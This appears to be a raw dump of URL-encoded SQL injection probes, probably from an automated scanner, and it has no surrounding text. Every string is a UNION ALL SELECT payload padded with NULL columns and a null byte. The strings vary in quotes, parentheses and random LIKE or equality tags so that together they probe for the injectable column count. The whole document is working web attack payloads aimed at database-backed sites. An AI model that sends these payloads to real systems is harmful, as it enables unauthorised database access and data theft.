1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27llBb%27%20LIKE%20%27llBb 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27gver%27%20LIKE%20%27gver 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27vSxf%27%20LIKE%20%27vSxf 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27XQoc%27%20LIKE%20%27XQoc 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27lnOS%27%20LIKE%20%27lnOS 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27gNlk%27%20LIKE%20%27gNlk 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27KKTO%27%20LIKE%20%27KKTO 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27xKrH%27%20LIKE%20%27xKrH 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27MXTw%27%20LIKE%20%27MXTw 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ITBL%27%20LIKE%20%27ITBL 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27VXyd%27%20LIKE%20%27VXyd 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27aTlN%27%20LIKE%20%27aTlN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27rMUd%27%20LIKE%20%27rMUd 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27amXg%27%20LIKE%20%27amXg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22tKrs%22%3D%22tKrs 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22QIuO%22%3D%22QIuO 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22kxeK%22%3D%22kxeK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22oLAY%22%3D%22oLAY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22nOzi%22%3D%22nOzi 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22gRLk%22%3D%22gRLk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22UfkT%22%3D%22UfkT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22oosH%22%3D%22oosH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22jmXo%22%3D%22jmXo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22hwjn%22%3D%22hwjn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ElZn%22%3D%22ElZn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22gQIy%22%3D%22gQIy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22QSKf%22%3D%22QSKf 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TaXh%22%3D%22TaXh 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22OoEg%22%3D%22OoEg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22UrWb%22%3D%22UrWb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22vZFT%22%3D%22vZFT 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22YxYo%22%3D%22YxYo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22wgLH%22%3D%22wgLH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22XiVh%22%3D%22XiVh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22QONx%22%3D%22QONx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22sqRi%22%3D%22sqRi 